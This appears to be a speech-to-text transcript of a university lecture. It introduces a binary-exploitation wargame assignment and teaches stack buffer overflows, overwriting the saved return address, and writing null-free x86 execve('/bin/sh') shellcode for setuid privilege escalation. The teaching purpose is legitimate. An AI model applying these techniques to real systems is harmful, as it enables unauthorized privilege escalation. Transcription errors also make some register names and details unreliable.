 All right, folks, let's take one, two, three. All right, I think they're over there. Thanks. So good news, good news, and even better news. Good news, strength breakers next week. Even better news, you get an award assignment. It's like the funnest one you've done, yes, on this class. So it's going to be great. So I want to briefly go over it. It's on the website right now. You can't access anything yet. So calm down, relax. There's nothing you can do at this point. That will occur after this class. It's split into two parts, basically, because I want to force you to get started on this and not wait till the end, because this is a very difficult assignment. So that's just amazing, honest. Thanks a lot. Well, strength breakers. No, no, no, there's plenty of time. There's only a few. The first five levels are easy, so easier. So, 10. So we'll get into that in a second. So basically, part one is two, 313, part two, 322. And you're basically going to be applying everything that we've learned about attacks on x86 binaries in Linux environments. So you're going to use all your skills and knowledge to break these binaries. The idea is everyone, so you'll get an email address with your username and password. So you don't have that yet, so you cannot log on to the system. I have it, so I should be able to, so I can log on to the system. So, let's see. So if I do ID, I can see I'm the name Adam D, group ID Adam D, but I also have a group of level one. And if I look at the handy-dandy var challenge directory, we can see that there's a number of challenges. There's actually 15 different challenges here. You can think of this as a ladder. You have to break the first challenge to get to the second challenge. This is why it's imperative that you start on this early, so you break the first five. Otherwise, you're staring at breaking 10 difficult binaries, or if you want to do it more in a span of three days. There's 15 up there. Yes. The other ones are after credit. Let's log on to the second. So the idea is, so we actually have studied Linux permissions. So which one of these directories will I actually be able to look at as my user? Yeah, level one. So I am user level one, which means all these directories are owned by a challenge user, which none of you will be able to be. The level one user is the group, or the group level one. And so I'm in the level one group, and the level one group can read and execute the level one directory. So I can do LSSLA Marge Challenge level one, and it will list in that directory. I actually can't even look at level two yet until I break that. So when we look at level one, we can see that inside there, there's a binary called one that's set. So the owner's challenge, the group is level two, and we can see that the s on the group execute bit means the group can execute it, and it's set group ID. So that when you execute this, it will run at level two. So you need to, and you can see how you run it as you did both of you. They're testing out the system. So I'll open that from here inside. So you can run the score command. So I've provided a score command which is the scoreboard, and no, that you broke at the level. And to actually, so when you break level one, you have to then become or join the level two group. This is like a, it's not super crazy difficult, but it's not straightforward. So to help you out, I provided a command called LEET. So when you, your goal is, and you can do which LEET, the one far challenge, level one binary to execute the LEET command for you, which will then make you be level two. And if you do that, then you'll be at level two, and then you can see the level two challenge, and then from there you'll be at level three, and so on and so forth. What happens if you execute the binary? I don't know, you go figure it out when you're on that one. That's literally the challenge, yeah. That's why it's LEET. I hope not. So we'll talk about that in a second. Cool. So yeah, all of you, all of you will have a user account on this system. So if each have your own individual user account, you can see there's a bunch of users on here. There's all of you, and everyone who's obfuscated, you're a hash, so no, you guys are real true hackers. Okay. So tools, a list of tools, but you guys actually already have some CTF like stuff, so you are familiar with these, which is awesome. Each point, each level is 10 points for levels one through 10. So it's all level one, we have 10 points, so on and so forth. Scoring is very simple. Levels above, so you may have the levels above 10 are extra credit. We may have new nefarious challenges to the end there, extending the ladder. They're worth, I don't know, that point of extra credit. It's not really about the extra credit, it's about being an awesome hacker and seeing yourself at the top of the scoreboard. So levels one through five, this is just a forcing function, to be honest. So just solve that. You don't have to submit anything. Solve levels one through five before the part one deadline for 100%, otherwise after that it's 25%. So don't do that, but you can still get points. There you go. You'll probably write code for this. So keep track of all the code that you wrote. Create a readme as you're doing these to document how you actually, as soon as you break it, go over to a text file called readme and write how you broke that level. So we have an account that we actually Yes, you will have an account on the system. I will give you SSH access. So you have home directory permissions and unlimited space? No. We are limited in capacity. I've actually added a bunch of mechanisms because over the years people have crashed it. So you can actually have each of you 50 running processes at once. Otherwise you can't spawn any more processes. So that does come up. So be careful about that. I mean it should, but I've seen it happen. Because I had people fork on my server before which is not good for anyone yet. And so basically you're not going to purge our home account every time we like it? Correct, no. It's running on Amazon ZC2. It has 4 cores and 16 gigs of memory. I did this. I think I used that last time and it was fine. So I don't think we'll have any capacity problems. But if not, that's the great thing about the cloud. I just get more. Yeah, but make sure you're keeping track of how you do this. It's really important if there's any academic integrity problems, which there has been in the past, this light's very clear that you did it. You're not just like, yeah, I broke the level one. If that's what you're reading is, there's a notification that you actually did this, right? And so, yeah. Questions? High-level questions. This is an individual assignment, so you got to work on it. You get extra credit for coming in first? Yes. No, not the first time though. So there'll be extra credit, let's say the top three overall. Yeah. Is the level process the same for each level where you're not going to get it and execute them? Yes. We have to, essentially you can think of it, you have to get all to the control flow, somehow get that to execute the LEAP command, either injecting code or kind of whatever using all the attacks we talked about. But yes, that definitely is. Or maybe, I mean, I actually don't remember so maybe I shouldn't talk about it, but I'm afraid of accidentally leaking information. But maybe it will call LEAP for you if you get certain conditions correct, something like that. Yeah. So would time be a tiebreaker? Yes, the scoreboard is sorted based on time solved to that level. Good question. Yeah, so you'll be able to see exactly where you stand. How many left? How many assignments will be this one and one other one? I think it may be more. Probably not more, but we'll see. Basically this type of challenge so a similar style, but with a web application. Which would be fun. I suppose as a part of that question, the mid-touch is... Yes, I'm going to decide today. I was setting this up. Yes. Alright, cool. You'll have fun. Okay, now we're going to cover materials so you know what to do. So some of the levels may do stuff that we may cover afterwards just the way it is. Use all resources. So essentially every resource is available to you except for each other. You can seek out stuff, but don't go posting a stack of stuff that looks like this. How would I exploit it to get HL or something? That's obviously super light. Anyways, I think it's pretty clear you all understand what's going on. Cool. So we talked about what is pushes arguments on to the stack in right-to-left order. Pushes the address of instruction after the call. The callee in previous... pushes the previous frame pointer and the stack creates space on the stack for local variables. Ensures that the stack is consistent with the return value and the EAA. Awesome. Exactly, so the idea is that the state-based pointer are stored on the stack. This goes back to the terrible analogy I tried to make on Monday about the trail of breadcrumbs. So let's look at one example of what can happen if we end up overflowing those values. We can have a quick function. MyCopy, which is void and takes in a character pointer has a local buffer foo of size 4 and a string copy foo of string. So what's the semantic? What's actually going to happen after that function call? So string of copy is destination comma source. So it's going to copy from string to foo. How much is it going to copy? Four characters? Until why? Who is no-targetator? So it's actually unbounded copy. The character pointer that's passed in, however many characters are in the string str, that is going to be copied onto foo. So this is actually one of the key problems here is string copy doesn't take a limit of how many characters to copy in. So fundamentally, this is one of those functions and we'll talk about some later. As soon as you see it, you know that if you can control the str variable you know that this is a vulnerability. So we have our main main. We're going to do my copy. I have stolen this from my 340 class. This is why you should never put class numbers into your slides, FYI. We'll print after, we'll return 0. So when we compile this out, we see that main, and this is a very simple program. So we have push, we have our pre-lock just like before, push EVP, move the stack pointer into the base pointer, subtract 10, and hex from the stack pointer, move some fixed hex address 8048504 into ESP, and then call my copy. So what is this fixed hex? What is that fixed, like that value? The address of this constant string ASUCSE 340 fall 2013 rocks. So the compiler puts that into the probably the read-only data segment. I can't remember exactly which one it is, but maybe our real data. And then in the elf header says that that data is loaded at this fixed pointer location and that's why the compiler can put in the fixed memory location onto here. And we can see it's moving it directly under the stack of the calling. So it's pushed the arguments to my copy into the stack. It's then going to move 8048517 into EAS. Yes? I think it's the actual S. Yes, it's a little average, so at that memory location should be the bytes ASU space. Okay, so this is another one of those weird compiler things 8048517 into EAS and then move EAS onto the stack. I don't know. Then call printf, so this is that call to after, so this must be the string at 8048517 and I bet if you did the delta between those two fixed values it would be the length of this string and an old byte because it's going to put the next string right after it is my guess. Then move 0 into EAS and then leave and return. So in my copy we have pushEVP, move the stack pointer to the base pointer, subtract 28 hex from the stack pointer then move EVP plus 8 into EAS, so what's EVP plus 8? The string SDR, yeah, the argument, right? It's a positive offset from EVP. It's going to be an argument. Then move EAS into ESP plus 4 load affected address EVP minus C into EAS so what's the value that's going to be inside EAS? Address of the local variable, exactly. So do the same thing if you took, what's the address of foo? The address of foo is EVP minus C into EAS and then move EAS onto the stack onto ESP. So now we have on the stack starting right from left what? A character pointer, so the pointer to SDR and a pointer to foo on the stack. So then we call string copy and then we leave and return because that's all the function does, right? Very simple function. So let's walk through this and just see what happens, right? So we have our nice registers, again we have EAS, ESP, EVP, EIP and we have all of our instructions at these fixed locations. We have our stack higher to lower and let's say the stack pointer starts off at FD2D4 and the base pointer is something else should be above it because it's a typo and we start off executing it main so we step through it and just go through this a little bit quickly, we push EVP we move the stack pointer to the base pointer we subtract 10 from the stack pointer we then move 80480504 onto the stack we then call my copy and so when we call my copy what's going to happen? How is this stack diagram going to change? How's the entire diagram going to change? The next part we're going to do is the stack pointer so we can change our stack. Awesome, so the call to my copy so it'll change the instruction pointer to 804803F4 we're going to move the stack down 4 bytes and then it's going to copy 80480423 the address after the call onto the stack there then my copy starts executing so it has to say it's base pointer pushes EVP, moves the stack pointer to the base pointer and then subtracts 28 hex from the stack pointer which is a lot so we have to change the diagram then it's going to move EVP plus 8 into EAX so what value is going to be inside EAX? Is it going to be FD2C0? Is that EVP plus 8? What's the difference between this instruction and this instruction? The move EVP plus 8 into EAX and load effective address EVP minus C into EAX At this point there's no such thing as arguments in multiple variables, yeah so in the first one of this move it's a dereference so take whatever is at EVP plus 8 dereference that, take those 4 bytes and move them into EAX so the value inside of EAX after this step should be 80480504 not the address of that that's the key difference between a move and a load effective address then we're going to move that onto ESP plus 4, again similar concept we're not moving this doesn't actually make sense there's no address for you moving a register into a dereference you can't change this memory address that doesn't make sense so that's another way to test and check so EVP minus C is FD2AC so we're going to move that into EAX and then we're going to move that onto the stack pointer and then we're going to call string copy so we know at this point we're going to need copy and basically string copy we know from the semantics from the man page we're going to need to look at how it actually is implemented but we know it's going to dereference 80480504 take that byte copy it to FD2AC increment the counter and check is whatever is at 80480504 plus I is it null if it's not then copy it to the next one so it's going to just keep copy copy copy as it goes through these pointers and this essentially means so we know that at that memory location 80480504 are the bytes ASU space CSE space 340 space and so what that's going to start doing is going to start writing those bytes onto the stack starting at FD2AC and I'll actually write it byte by byte but it's kind of annoying because we have the four bytes we're looking at things in terms of integers so this is going to have the endianness so the byte pattern will actually look backwards because of the endianness this is what I said where it gets a little bit tricky here but if you looked at like what's at address FD2AC is 61 which is hex lowercase a what's at FD2AB is 73 and so on and so forth and it's going to keep doing that because it doesn't know that this buffer foo in the C program is only supposed to be four bytes because the CPU doesn't care about buffers or arrays or anything all it cares about is just moving bytes through memory into registers and it's going to keep going there's no check anywhere that anything so it's going to keep going and it's going to keep writing it's going to overwrite the saved EBP on the stack it's going to overwrite the saved instruction pointer on the stack it's going to overwrite even the argument to the function at EBP plus 8 and it's actually going to keep going and then it returns so does it crash in string copy did it ever write to invalid or is the stack writable yeah it has to be right because that's the entire purpose of the stack the stack is writable did the string copy write to anywhere that's not the stack did it write to unallocated memory did it write to read-only memory that's not writable no so it just returns it just doesn't write boom boom boom boom changing bytes and then it returns back to us because where on this diagram where is string copies frame function frame string copy and overwrite and mess up its own frame buffer lower the right point lower down on the stack the stack is growing down so when we call string copy we actually know right underneath FD290 will be the address of 8048040C the address after call string copy and then we know there will be a save base pointer underneath that but so this is the way that why this actually didn't cause a problem is because when we write to a buffer we almost always write increasing we essentially can think we write up and the stack grows down so we can corrupt things on function frames above us but it's harder to unless for some reason the buffer is iterating the other way from the last finish that set in 5 think about that going the reverse direction having to corrupt the function frame after you okay so then so then it returns right and then does my copy crash at this point it crashed at my top I don't know that's what we're talking about so it just returned from string copy so the instruction pointers at 8048040C which is the leave instruction so will the leave instruction execute yeah right there's nothing stopping me it got to this point right because of the return from string copy and then we're going to do a leave which is going to set the what is it what should I tell you yeah set wait what is we going to do set the stack set the stack set the stack pointer pointing to the current base pointer and then what popPVP so basically replacing so what this is going to do is it's going to put our arrow the base pointer and stack pointer are going to point to the same address and we're going to do a popPVP which means the value inside will be 6C6C6166 which is all backwards in ASCII the stack pointer up is it going to crash at this point does it dereference that value or try to access anything off of VVP it's just copying a thing in memory on the stack into a register that doesn't cause it doesn't matter what that value is if you copy null from the stack into a register it's not going to cause it to crash and then we get to return so what's return going to do I'll just push on the stack and then it's on the stack so try to do it for the stack which is the hex value so which hex value is it going to try executing at if you can see it or maybe you can't maybe somebody else can 3, 1, 3, 0, 3, 2, 20 so that would be space 2, 0, 1 backwards in hex so that's what and then it's going to try executing from there so if assuming that memory region is not mapped in our program to memory, what's it going to do second fault, right? it should throw a second fault and crash the whole motor because the EIP will be 3, 1, 3, 0, 3, 2, 20 and then it will try to fetch memory from there but it can't access that memory so it fails and that's what we'll get so I did this ran this program you can do this yourself you can copy this C code I highly encourage you to do that and you can see even with WALL so showing all warnings it doesn't give any warnings or anything we run it and we get a stack fault and then if we run it in GDB and say run it'll run it and it'll say a stack fault 3, 1, 3, 0, 3, 2, 20 because it's trying to access that memory there and if we do GDB which shows us all the registers we can see that the EIP is 3, 1, 3, 0, 3, 2, 20 and the EPP is at 6, 7, 6, 7, 6, 7, 6, 1, 6, 6, 6 so this is already good because we know that this means that we can now completely so we can take down this program or this program let's say that string was our input not our code into the program by supplying that input we can get the program to crash but that's not cool enough that doesn't give us access and permission that we don't normally have so what we're going to look at doing is how to do this in a way that A doesn't crash the program and B executes arbitrary instructions that we decide what they are so these are some of the overflowing functions in the sense yes if you keep on writing above F's like all the way to FFF you should be able to get there in most actually I would say nowadays in every single system writing to 0 is going to be a a segfault because 0 is null in almost all systems so they make sure that nothing is mapped there otherwise you could have a null pointer dereference that actually gives you a value in your program or crash so say again oh yes in my copy that's what it did I don't know how I decided that so even though it's only a 4 byte buffer it's giving all of this value so this is one of the reasons why it's so important to look at the binary of the assembly itself because if you look at the code you say oh there's 4 bytes here that means there must be 4 bytes from my buffer to the base pointer and then 4 bytes beyond that to the save VIP but the value is right here and standing in the face and actually you know that evp-c that means even though they subtracted 28 from your buffer there's only hex C characters up to evp and then evp points to save evp which means another 4 and then you're at the saving buffer pointer so you can just map it out and not guess which is awesome alright so these are functions that are essentially any function you can see in the C language that copies memory without letting the programmer specify the final size that the string can accept so gets is a function and this is another key so gets gets from standard input so it only takes one parameter which is the buffer and a breach from standard input putting it into that buffer this is like the the worst possible function that we could ever imagine making because literally any usage of this string of this gets command is 100% vulnerable because it's literally running from standard input which is you, the user which is attacker controlled and it's fundamentally an unbounded breach so there's no possible way even if you have a buffer that's 10,000 I can always get input 10,000 or even if it's a gigabyte I can pass in a gigabyte plus however much I need so this is inherently the other thing is gets maybe less bad but just in the sense that because you're reading from a specific file so you could open a file that you control and are technically know the size but all of these types where you can't specify the exact size to read from they're all bad where they can be vulnerable, gets is virtually 100% vulnerable but the important thing is each of these functions operate differently so are these functions provided by the operating system? are these system calls? no, libc, yes they're in the C standard library so each of these functions has different semantics on what it considers the end of the input so gets will keep copying characters until it gets to a new line and this is something that you need to keep in mind if let's say you're trying to send input to the function to standard input and you're trying to create as we'll see some kind of exploit payload if you include a new line it won't include all of your payloads you have to make sure that your payload doesn't include any of these characters new line or end of file is not a character this literally just means the end of the input you've read the end of the file and string cat so these are other functions if you control the source parameter there's no possible way that a attacker can there's no possible way that a developer can ever specify a fixed value in advance actually in this way there's no possible way there's no way to create a buffer big enough in advance so what's going to be a character that you can't use in your exploit for a string copy? null because that's going to be considered the end of the string but new lines are fine so these are differences you need to think about as we'll maybe get into we'll see there's a whole category of shell coding challenges which I've got you on the most basics of one at the last CTF where basically they do crazy things like your shellcode has to be ASCII like your payload has to be just ASCII characters or oh man what was the yeah there's one CTF where it was an image you gave it an image and then it would take pixels from there calculate an error correcting code and then that would end up being your shellcode it was insane yeah all kinds of crazy stuff so scanf scanf family of functions these can also be vulnerable with a percent s which reads onto a character string the input routine these functions are very clearly because they have well defined semantics but you can easily write code that keeps reading even with getC with get1 character if it keeps reading it, unbound it that can also be a vulnerability so you don't need you need to understand these functions but also realize it's whatever the code does you have to think of and the code includes all three functions that it's calling as well alright so how do we actually exploit this so what's going to be our goal we've already hinted at it many many times here overflow the buffer step one, step two figure out how we yes okay so we need to so essentially with what we've seen we control the EIP register so if we have an arbitrary right onto the stack a buffer overflow we know we can overflow that buffer EIP on the stack which is actually important for more advanced techniques but we can ignore that for now because what we really want to eventually control is the instruction pointer if we can't control the instruction pointer then we may have to try to do other things so we want to control the instruction pointer and we saw here we can give it a garbage value that doesn't exist in the process memory space and it will crash but what if we just gave it let's say a random address that was actually in the processes memory space that was allocated to the process let's say possibly, that's one option but we know that the CPU just in this case it's going to fetch do the decode step with the whole pipeline decode the instruction that's at that address and if we just do randomly they may have the x86 and so this is what we get into the case of we are in a time machine going backwards so we looked at all the elf second elf headers so it used to be that the stack was marked executable so it was writable, readable, and executable and actually some programs legitimately do this even today so any you've heard about JIT Justin Klein compilers that compile Java to native code on the fly they literally create executable code on the stack or on the heap or wherever and that's the code so this is still a thing that does happen so anyways now let's say now we know that our heap is executable you think it's possible to load an instruction and have almost like a callback function that you can execute before doing that I don't think I said that, I said the stack is executable and we can control the EIP by overwriting onto the stack so what do you want to write into that onto that saved EIP onto the stack which will then become the EIP register which will be where we register and execute what would you like to put in there I mean there is some of the new function that we have that is of the material that we wrote and we can actually write x86 code as long as it doesn't have any of the if we're using get it doesn't have new lines or if we're using string copy it doesn't have any nulls if we put those address it if we put those byte values onto the stack and then we change the instruction pointer to then point to the start of those instructions the CPU doesn't care that it's on the stack as long as it can execute that memory region so it will decode fetch swap those fetch decode that instruction and keep executing that is our goal at this point actually our goal is to get control of the execution of this program and what we're talking about now the goal is we want to control the EIP and make it jump to code that we inject into the application and this will so it's still this is still a fantastic paper that I go back to every so often to refresh myself so I highly recommend you look first matching the stack for fun and profit oh I wish I knew what year came out in but frack magazines so frack magazines are just still around and the main comes from the like phone freaking days of what we talked about way back at the start of this class in January so and the code that we're going to inject is called shellcode because the idea is we wanted to give us a shell like bin SH so we can then execute arbitrary commands but the main shellcode doesn't necessarily mean it gives you a shell you can have shellcode that does all different types of things that reads out a file and sends it back to you you can have shellcode I mean you're literally injecting custom x86 code so you can do anything that the program could do or even things that maybe it didn't think that it could do so you can have what they call a reverse connect shellcode where the shellcode will connect to you on a certain port and wait for commands you can have shellcode that listens on a port on that server and waits for you to connect to it you can fork bomb stuff I don't know literally anything that your mind can come up with we've been talking about it the whole idea is that code that we inject us as an attacker we can write that function or that code when we run and execute it what permissions does it run as us, yes our user right but if we exploit a setuid program and we inject code into its process and get it to execute that function what permissions does that one have yes whatever permissions the setuid user has perfect so we want to call essentially we're a country that I mean the basics, execve slash bin slash sh and we want to do in depending on how nice we want to be so actually let's and execve so this is the system call that we want to call the parameters that we want to pass in are the filing we want to execute slash bin slash sh that is I believe at the posic standard that's on every single unix system then the argv vector so if we want to be like a normal program what will we pass as the argv vector what is the argv vector the arguments to the program so what program do we want to execute minsh so do we want to pass in any arguments is the first question no we want to just run a shell like binsh like you can in this shell if I want to run binsh I do slash bin slash sh and now I'm running a shell right now it's doing stuff for me but when I run slash bin sh like this so I'm actually running already probably bash which is going to as we went through is going to call execve with slash bin sh the argv parameter how many parameters is it passing in what is that one parameter the name of the program yes argv0 is the name of the program exactly so and this actually bit me in a ctf which is why I made no point in this you can write shellcode to do execve slash bin sh but the problem is some versions of bin sh specifically there's this system called busybox and this is what the ctfs use and bin sh if it's executed without the arg0 parameter it won't know what to do and it won't work and this caused me like hours of frustration I think you were there for that that was super annoying so I was running shellcode to pass in slash bin sh in an array as the second argument to execve and for the environment we really don't care because once we get code execution of bin sh we're good so our goal is if we were to write this in C we'd have some buffer and character pointer and array so this is the character pointer pointer name right it's an array of character pointers name 0 is going to be slash bin sh and name 1 is going to be null so why is name 1 going to be null yes because that's the semantics of execve execve says the second parameter can pass in a character pointer pointer and how I'll know it's at the end is because the last element of that character pointer array will be null and then execve name 0 right so we want to pass in bin sh there and then name and then null and then if we're really nice we'll exit afterwards this should never actually happen because execve doesn't return unless there's any errors but I like to write it nice stuff but it don't happen okay yes and so we know so this execve system call so it goes back to the calling semantics so how does a program invoke a system call in 80 yeah in the last one and then it has to set up the variables in specific registers before that actually happens I actually don't know I think it will be here there we go so and you have to look this up because there's a table that maps values in the eax register so value of 11 in hex B in eax means execve so the goal of our show is kind of looking backwards the very last thing we want is in 80 because that's going to be the system call at that point in our assembly code we need the hex value of B to be inside the eax register otherwise nothing's going to work we need the address of the program name in ebx so does this mean we need the string byte values of slash bin slash sh into ebx it has to be the address and slash that's six bytes that doesn't fit and it doesn't make sense because B the important thing is looking at the function specification the address of the program name this file name parameter gives a character pointer which means it must be an address and the bytes at that address need to be slash bin slash sh and the goal byte then we need a double character pointer as a second argument so in ecx we need a pointer and at the at that pointer where that pointer points to that needs to point to a string slash bin sh and then four bytes past that pointer needs to be null because otherwise those will be the arguments that are passed to hard B and then we just need null so we just need null and the ebx that's super easy to do and then call in A we inject this shellcode in some way to the application so let's say we'll change the previous example instead of a string copy well actually I'll see what we do instead of a string copy of a constant string it'll be a string from artv1 or something from the user and so we'll be able to control the bytes that are overwritten on the stack and the exit just to be to show you that you can do different kinds of system calls so exit takes in the status so the value of one in eax because that's the index of the system call table exit and the exit code in ebx and then call in 80 so this actually code is much easier to write just to move one into eax move zero into ebx and then input so how do we actually do this so think about the code you're sitting down to write this you can think of this like a checklist you have to have all of these conditions be true by the time you're done be into eax how would you do that set x86 assembly that's the only thing that the computer or the cg understands so move out dollar zero xb destination just a move move immediate b into eax that one's super easy so this is nice we can control any single value inside ebx or any register we can change that at will these next ones are trickier but not impossible so the problem is we need an alternative string slash bin sh somewhere in memory in the program's memory space we need the strength in sh we also then need not only the strength in sh we need we also need a pointer to the memory address like a pointer to the memory address wait what am I talking about okay I don't see it okay I need to draw a picture at some memory location right we need slash bin slash sh let's call it foo for now some memory location in the program it needs to be readable by the process and then we need somewhere in memory so then we're basically going to say move in some sense the address of foo into dollar sign percent ebx of course this is not about the standard instructions we need to figure out some way to do this and then we need somewhere in memory let's say at bar we need those bytes to be essentially the address of foo and then null and then we need some kind of move address of bar into bcx so what do we know that the program has that is right at all in that we can possibly store values in we could use the data segment there's a dot data segment in every process but it's different it starts at different memory locations when we did our overflow did we corrupt or change the stack pointer no stack pointer was at the same location so we can actually cheat and use the stack I just closed that so these are the steps we basically already have this so okay so we're going to actually cheat first we'll just write the code to show that this actually works so if we were writing this as an assembly program we would do .strain in 0 and then we'd have our text segment .globalmain which is just for compilation purposes we'd have a main function move xb or 11 into eax move dollar sign sh into ebx so this is going to move the address of that string then sh into ebx going to push 0 so here is where we're going to use the stack so we're going to push 0 onto the stack and then we're going to push the address of then sh onto the stack and then we're going to move the stack pointer because right now the stack pointer points to so the points to yes, points to the start of an array that that points to the string then sh and the next one after that is f0 and then we're going to move the stack pointer into ecx, move 0 into evx, call in 80 because we're good we're going to move 1 into eax, 0 to ebx call in 80, this is just the exit system call and then we're done so you can compile this you can run this, you can even compile this with cc it'll do everything call the preliminary shellcode s, you can run it and it's going to give you a shell because it's going to call execve bin sh with argument rv of slash bin sh so and we can look at it and you can look at the assembly is almost identical to what we wrote so if I took this I threw this and I copied that onto the buffer of the program that I just saw you have to copy it exactly at the top and bottom so you do b8, b0, 0, 0, 0, 0, 0, bb 1, z, 9, 6, blah, blah, blah and I changed the ip to point to the start of this what's going to happen it's going to start executing am I going to get a shell? why not? you still got a feeling of no? it's too early because I called it the preliminary shellcode we're not actually passing any argument to the shell or that's no no we are because we're passing in so we use the stack pointer so inside dcx will be a pointer to the stack pointer and on there that will point to bin sh no, not the null bytes I don't care if it's null bytes at this point let's say we start out and get all of them in there but not a string copy an fget sort of something are you asking about porting this assembly onto another thing or are you asking to put this code right here? I said if I take this code right here I copied it byte for byte into onto the stack and then I change the instruction pointer to save vip to point right to this very first instruction and I start executing it what's going to happen what kind of permission issues it wouldn't be a regular user let's say I've fixed all of those issues we'll talk specifically about that but I've done that all correctly is the array that's at 804961c available on that where is 804961c in this according to this shellcode what is there? it's a pointer what is at that memory location? the bin sh slash bin slash sh exactly but when we take this code throw it into another process what's at every location 804961c we have absolutely no idea it's literally anyone's guess there could be something there there could be nothing there it's highly unlikely that there is the string slash bin sh which is that string that we desperately want and without that the exec vd is going to fail because the kernel won't be able to read that memory in the process or it will read it and it will be something super weird so you should always test your shellcode or any other things that you write and so you can easily do this in many different ways I like and I'll reference some tools in a bit so you can copy those bytes onto a c string this is the shellcode and then I can create here we go this is it's a pointer it's a declaration of a variable called shell which is a function pointer so this is how you can do super cool stuff in c and passing pointers into functions and do all kinds of crazyness and we can just say shell is equal to shellcode we can call the function shell because it thinks it's a function it's a function pointer and then see what happens so if we do this and we'll have to do the dash v executable stack which makes sure that this process has an executable stack just like we said used to be the base for all software and we run it and we see we don't get our beautiful shell and the problem is exactly the one that we just identified the problem is the strength in sh is not in that program and this is the super cool thing about shellcode because you're injecting x86 code into a process another process it can't rely on any fixed memory locations so what do we do what are some ideas or techniques that we can try yeah you can just put the string array on the stack itself and then point to the location that you have yeah so it's good I cheated at that with my talk about the stack too early but that's fine yeah so there's a couple ways actually you can so a fundamentally think about it theory wise your shellcode must contain a string it could be encrypted or ROT 13 but if you're injecting something into a process you're expecting that the memory side of the sh is there or is it somewhere there's a really cool technique you used to be able to do of calling so when you do a call instruction it pushes onto the stack the next instruction to be executed so the very first thing your shellcode would do would call to the end of your shellcode because calls are relative offsets so you call to the end of the shellcode which puts onto the stack the pointer to your shellcode and then you jump maybe it was backwards and then you jump back to the next byte so you get on the stack the pointer onto the stack but a much better way is to push values onto the stack which is way easier so what we're going to do is push the string slash bin slash sh onto the stack and we can do this with fixed values we can push zero so we have to do it in the correct order so that these pushing ends up correctly so that is kind of annoying which is why I have these comments that this is pushing bin so you have to read it right to left so it's pushing bin slash sh zero and now after these those two functions execute these two instructions execute what is ESP pointing to the stack pointer bin sh is exactly what we want so now we can and we know that inside the EVX register must be a pointer to the string bin sh which means we can move the instruction pointer into EVX and then inside EVX we need a pointer to bin sh why do we want to populate the zero like four bytes of zero before this so then we can reuse for the second part we can do anything as long as it's semantically correct but that's a good thing to think about but now we do need to set up our array so we do it like before push zero, push EVX because EVX is what the pointer to the string bin sh which means now the stack pointer contains a pointer to an array that first element points to the string bin sh and the second argument is the second element of that array is zero so now we can just move the stack pointer into ECX and then move zero into EVX because we want zero for the environment pointer and then call in eight so now we have our exact EV, filename, RV, environment pointer and then we'll have our same exit at the end so we can we also want to test this shell code picture this works then object up it, take these bytes copy it into our shell code tester and then we'll get our shell so that actually works so as long as we can get it to start executing at that very first byte that's six eight now we have a problem that was brought up earlier the problem is we have nulls in the shell code so string copy if we have as our input is being string copy well it's going to copy B8 zero B and then nothing so that's the only thing that's going to be copied over so we need to rewrite our shell code so that it has no zeros sorry no null bytes and we probably want to eliminate new lines as well I don't think there's any zero A's in here but for a similar thing with gets you want to make sure there's no new lines so how should we do that so I guess the first question is where are those null bytes coming from there's a couple bad ones so I'm going to cherry pick ones so like moving zero into EV at one what are other ways we can XOR XOR with itself and we know it would be zero spoiler alert that doesn't have zeros that would be the second thing to check so we can change all of those to that what about this move B into EX why is there zero bytes in that instruction is it because of the move because it's moving four bytes but what do we only care about in EX the lower bytes an AL register so if we move B into AL that would change the last the least significant byte in EAX to B XB but is that going to work in every single case so let's think about this before our instruction before we start executing what's inside the register in EVX zero zero we can't trust anything we don't know the value inside any register so there could be all Fs inside EAX if I say all Fs inside EAX and then I move B into AL that's going to be FF FFB which is zero B which is not what we want so we should zero out with EAX using the trick that we just talked about so XOR, EAX with itself and then move B into AL and I think that'll get rid of most of these what about this zero why does this zero exist in the second instruction what was that byte three so the upper byte because what are we trying to put onto the stack four bytes which four bytes, why zero, one, two, three yes but no kind of I see where your logic is what are we pushing onto the stack bin slash bin slash SH zero so we can actually use the trick in our dimension we can push XOR, EAX with itself so we know EAX has zero we can push EAX onto the stack so now there's four full bytes but and then we can actually there's a hundred different ways you can do this the main way is you use a trick of X of pass because the problem is if you try to so you're trying to push slash bin because that's four bytes you have to do it in reverse order so I like to think of it the other way your last one is doing push slash bin the first one is doing slash SH that's only three characters I don't think you can push an immediate value that's three characters I don't think you can push three bytes onto the stack so you need to push four bytes so what you can use is the fact that you can have extra slashes in half names so you can exec slash bin slash slash SH and that's exactly the same thing so we can do that to make eight bytes wide exactly which should get rid of all of the null bytes I think so we can push so this is pushing N slash SH so it's putting the slash at the beginning which is kind of confusing okay so we XR Eax now we know Eax is zero we're gonna push Eax onto the stacks so now we know there's four bytes on the stack that are zero we're gonna push N slash SH and then push slash slash Bi so we're actually gonna do slash slash Bi and slash SH so now on the stack we know where the bytes slash slash Bi and slash SH zero which is an alternate string which is exactly what we want then we're gonna move the stack pointer to the base pointer then we're gonna push Eax on the stack why are we pushing Eax on the stack yeah we're taking advantage of the fact that we know Eax is zero so that's gonna get, we used to have a push zero onto the stack to get that null, the null value in our V drop on the stack so we push Eax we then push EBX which is the pointer to the string bin SH or slash slash bin SH then we move the stack pointer into ECX and then we move Eax into EDX so what is this doing we have EDX because Eax is zero we know that for a fact so you can always do X or EDX or EDX it's a fun game to actually, people spend a lot of time trying to rewrite shell code to make it smaller and better and cooler and then we need to move Hex B into AL the lower 80 bits of Eax and then we call it 80 because we've set everything up correctly and then we have our exit just for good fun so we can compile this, run it and it will work, it will give us a shell locally, we can test this shell code and it will work and give us a shell oh and this one's broken so don't copy it, do it yourself good that I put that there I was thinking like, pretty sure that did that so now that we've done this we've written this shell code so these are essentially, these are some magic bytes we can throw it to any process and as long as these bytes are inside executable memory and we can control the instruction pointer to start executing at the start of this at the very first byte here this will give us a shell the other fair warning I'm going to give you now so keep it in mind when you're doing these binary challenges you have to think about what are you doing so by pushing things on the stack you are changing the stack correct, you're pushing the string bin s h onto the stack where's your shell code living because we copied it onto the stack on the stack so keep that in mind because I had to I spent, yeah, so while so a while back debugging code because of that so now it's on you, now you know why and I'll be like, I told you in class you'll be upset until you figure it out alright, but now we need to figure out so this shell code is not this long not that long can anybody count really quick, was it 8x4, like 33 bytes which is pretty short so as long as we can copy 33 bytes onto the stack and then overwrite the saved instruction pointer to be in the address of the very first instruction we can completely take over a program and as they say, pop a shell so we need the shell code we need then random jump up to the EIP and then we need the address of the shell code so I'm going to go through this I want to make sure I cover this so I will let you go through this, hide your ledger so this is, you can see at the bottom here this huge GCC command which has all of these options of f no emit command pointer and all of these are security protections that I've been adding over the years so we'll be disabling them as we've learned about in 